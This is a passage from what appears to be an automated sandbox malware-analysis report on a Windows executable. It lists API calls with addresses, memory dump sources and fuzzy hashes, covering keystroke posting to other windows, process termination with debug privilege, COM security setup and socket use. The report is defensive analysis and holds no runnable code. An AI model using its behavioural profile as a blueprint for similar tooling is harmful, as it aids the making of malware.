                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0065968E
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006596AB
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006596AE
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006596B7
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006596D5
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006596D8
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006596E1
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006596F8
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006596FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: c27469f3513b12bfdbd73e2155843c883f4592915e745a56b906c17f92d149d4
                                                                                                                • Instruction ID: 077fea6965d62ce1c42bb662a1854e5b07c47f97b2071423a2b589ee79330eeb
                                                                                                                • Opcode Fuzzy Hash: c27469f3513b12bfdbd73e2155843c883f4592915e745a56b906c17f92d149d4
                                                                                                                • Instruction Fuzzy Hash: 7511E1B1A50218BEF7106F60DC89F6A3B2EEB4C751F101629F644AB0A0C9F25C50DBA8
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0065853C,00000B00,?,?), ref: 0065892A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 00658931
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0065853C,00000B00,?,?), ref: 00658946
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0065853C,00000B00,?,?), ref: 0065894E
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 00658951
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0065853C,00000B00,?,?), ref: 00658961
                                                                                                                • GetCurrentProcess.KERNEL32(0065853C,00000000,?,0065853C,00000B00,?,?), ref: 00658969
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 0065896C
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00658992,00000000,00000000,00000000), ref: 00658986
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: eaf532770a16531f9294607d09ef6c62c224f2da21439567494f721b78f3ca0a
                                                                                                                • Instruction ID: 313db503978707e343fe07ce0a4ae43f3fc4acc9febbd71605772b4cda3f0d01
                                                                                                                • Opcode Fuzzy Hash: eaf532770a16531f9294607d09ef6c62c224f2da21439567494f721b78f3ca0a
                                                                                                                • Instruction Fuzzy Hash: 7C01B6B5240308FFE710ABA5DC8DF6B7BADEB89711F419521FA05DB2A1CA749810CB20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: 2ffc7ca92c6899955bfaa4c8a4f00dcf78ea9bb9bdc485d077dad49f06478e51
                                                                                                                • Instruction ID: 8fb37c46222f14d7dd8244a1dc00361b7e8b83ce23e704235f94b93cbc344e9d
                                                                                                                • Opcode Fuzzy Hash: 2ffc7ca92c6899955bfaa4c8a4f00dcf78ea9bb9bdc485d077dad49f06478e51
                                                                                                                • Instruction Fuzzy Hash: 84C1A371A0021A9FDF14DFA8D884AEEB7F6FF48314F148569E909A7381E7709D45CBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0065710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?,?,00657455), ref: 00657127
                                                                                                                  • Part of subcall function 0065710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657142
                                                                                                                  • Part of subcall function 0065710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657150
                                                                                                                  • Part of subcall function 0065710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?), ref: 00657160
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00679806
                                                                                                                • _memset.LIBCMT ref: 00679813
                                                                                                                • _memset.LIBCMT ref: 00679956
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00679982
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0067998D
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 006799DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                • Opcode ID: 658528ecbc4288f24a384036068b611770c991c3a160695b629fccbee0e69600
                                                                                                                • Instruction ID: 9161dc0b8222f7b42cdcda388b83c950f004c9ebf250a8d6415be80ce5ae937f
                                                                                                                • Opcode Fuzzy Hash: 658528ecbc4288f24a384036068b611770c991c3a160695b629fccbee0e69600
                                                                                                                • Instruction Fuzzy Hash: 3B911A71D00229EBDB14DFA5DC45EDEBBBAAF08310F10815AF519A7291EB715A44CFA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00686E24
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00686E38
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00686E52
                                                                                                                • _wcscat.LIBCMT ref: 00686EAD
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00686EC4
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00686EF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                • Opcode ID: fa92b7fa6f0bcb7e6f70ef296bdfb9a958196be5b11dd5f647319819aea4e4f9
                                                                                                                • Instruction ID: c189a7ac14bb04b1e9746d3e66087ae831aa55c42fc367df35ff6312aac9df28
                                                                                                                • Opcode Fuzzy Hash: fa92b7fa6f0bcb7e6f70ef296bdfb9a958196be5b11dd5f647319819aea4e4f9
                                                                                                                • Instruction Fuzzy Hash: 7141B270A40308ABDB21EF64CC89BEE77EAEF08350F10062AF585E7291D6719D848B60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00663C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00663C7A
                                                                                                                  • Part of subcall function 00663C55: Process32FirstW.KERNEL32(00000000,?), ref: 00663C88
                                                                                                                  • Part of subcall function 00663C55: CloseHandle.KERNEL32(00000000), ref: 00663D52
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067E9A4
                                                                                                                • GetLastError.KERNEL32 ref: 0067E9B7
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067E9E6
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0067EA63
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0067EA6E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0067EAA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: 2497b957456e88143891e766fa8ca548d06e228eed337db4d8efae7c7c917870
                                                                                                                • Instruction ID: b0b65319215a93b2686d16ab734d3d83deaafc75044364082726ce7dc4100d98
                                                                                                                • Opcode Fuzzy Hash: 2497b957456e88143891e766fa8ca548d06e228eed337db4d8efae7c7c917870
                                                                                                                • Instruction Fuzzy Hash: 0B4198716402019FDB14EF24CC95BAEB7A7AF54314F08895CF9469B3C2DB72A848CB99
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00663033
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: f346b56536549639791c708197a9e18055a3fc1a0ee8922eaa3d0a4bd24f7282
                                                                                                                • Instruction ID: a428cc02608aa43235a3ceaef4322b0fedd630afdfe190d7e4146ce272bb1c91
                                                                                                                • Opcode Fuzzy Hash: f346b56536549639791c708197a9e18055a3fc1a0ee8922eaa3d0a4bd24f7282
                                                                                                                • Instruction Fuzzy Hash: 6B11D832648757BEE7259B54EC42CEF679E9F15360B20002AF90067382DB715F4557A4
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00664312
                                                                                                                • LoadStringW.USER32(00000000), ref: 00664319
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0066432F
                                                                                                                • LoadStringW.USER32(00000000), ref: 00664336
                                                                                                                • _wprintf.LIBCMT ref: 0066435C
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0066437A
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00664357
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: dd0d917a40cc73274dbe0d722b31bb1f356511f5f7cbb4e45b44ae9970cfe162
                                                                                                                • Instruction ID: 9bddac04fb90cec70a10dd1dcceef7ee0c1a645cc41d4a0b43c24b092268e08e
                                                                                                                • Opcode Fuzzy Hash: dd0d917a40cc73274dbe0d722b31bb1f356511f5f7cbb4e45b44ae9970cfe162
                                                                                                                • Instruction Fuzzy Hash: CB0186F2900208BFE751ABA0DD89EF7776DEB08300F0006B5B745E2151EA745EC54B74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0068D47C
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0068D49C
                                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0068D6D7
                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0068D6F5
                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0068D716
                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0068D735
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0068D75A
                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0068D77D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1211466189-0
                                                                                                                • Opcode ID: ef3af4982a59e480caa205b596eae2b9dacc95ad0ca2609a4cd0b72e84a6eb14
                                                                                                                • Instruction ID: dffd095f7499e891e7fced219493a815553fa1d6d6c30d6064a48b8ac856125f
                                                                                                                • Opcode Fuzzy Hash: ef3af4982a59e480caa205b596eae2b9dacc95ad0ca2609a4cd0b72e84a6eb14
                                                                                                                • Instruction Fuzzy Hash: E7B17C71500229EFDF14DF68C985BED7BB2FF04711F088269ED589B295E734A990CB60
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 00602ACF
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00602B17
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 0063C21A
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 0063C286
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 2066fad11d594fe86a5e954714886474103d9871fd61f97d9bf5299814d81718
                                                                                                                • Instruction ID: 12f0e73f62da2339cc127547c7b6da6065040f1e1c7c023d90cf859fd004fa2e
                                                                                                                • Opcode Fuzzy Hash: 2066fad11d594fe86a5e954714886474103d9871fd61f97d9bf5299814d81718
                                                                                                                • Instruction Fuzzy Hash: AC412C30744681AEDB3D8B289CACBBB7B93AF45314F14891DF047926E1DF75A882D760
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 006670DD
                                                                                                                  • Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
                                                                                                                  • Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00667114
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00667130
                                                                                                                • _memmove.LIBCMT ref: 0066717E
                                                                                                                • _memmove.LIBCMT ref: 0066719B
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 006671AA
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006671BF
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006671DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 256516436-0
                                                                                                                • Opcode ID: 2d04d7b6e39aed7a61c0bb7997fde4d21816b905b104690af6b99cffc03023d6
                                                                                                                • Instruction ID: d9a21dc202d43b82c959c6344ab7f8f14e27a57c0830fa45a3c154efb0bae1b8
                                                                                                                • Opcode Fuzzy Hash: 2d04d7b6e39aed7a61c0bb7997fde4d21816b905b104690af6b99cffc03023d6
                                                                                                                • Instruction Fuzzy Hash: 32318D71900215EBDF40DFA4EC85AAEB7BAEF45710F1541BAF904AB246DB309E50CBA4
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 006861EB
                                                                                                                • GetDC.USER32(00000000), ref: 006861F3
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006861FE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0068620A
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00686246
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00686257
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0068902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00686291
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006862B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: f48a22cb2e1787cded0aa88f91621b4d1730ae5bbe57c4e1b9d1ab4fdcaf12fd
                                                                                                                • Instruction ID: e5bca9334b1e270327d79e907e383a4780f184a6b159aff14fe6b282154037ab
                                                                                                                • Opcode Fuzzy Hash: f48a22cb2e1787cded0aa88f91621b4d1730ae5bbe57c4e1b9d1ab4fdcaf12fd
                                                                                                                • Instruction Fuzzy Hash: D7319F72100210BFEB109F10CC8AFEA3BAAEF49765F040265FE089A291D6B59C41CB74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                  • Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9
                                                                                                                • _wcstok.LIBCMT ref: 0066EC94
                                                                                                                • _wcscpy.LIBCMT ref: 0066ED23
                                                                                                                • _memset.LIBCMT ref: 0066ED56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X
                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                • Opcode ID: b9c9331d9302d1547160f1e77be0d2200ebce81f3d834b9791ed316fc496bdf1
                                                                                                                • Instruction ID: c202571e83af3a85880ed27c941a170d2dcdaad6d7528aface5226a5758c28f8
                                                                                                                • Opcode Fuzzy Hash: b9c9331d9302d1547160f1e77be0d2200ebce81f3d834b9791ed316fc496bdf1
                                                                                                                • Instruction Fuzzy Hash: 78C180755087419FC794EF24C841A9BB7E6FF85310F00492DF89A9B2A2DB31EC45CB56
                                                                                                                APIs
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00676C00
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00676C21
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00676C34
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00676CEA
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00676CA7
                                                                                                                  • Part of subcall function 0065A7E9: _strlen.LIBCMT ref: 0065A7F3
                                                                                                                  • Part of subcall function 0065A7E9: _memmove.LIBCMT ref: 0065A815
                                                                                                                • _strlen.LIBCMT ref: 00676D44
                                                                                                                • _memmove.LIBCMT ref: 00676DAD
                                                                                                                Memory Dump Source
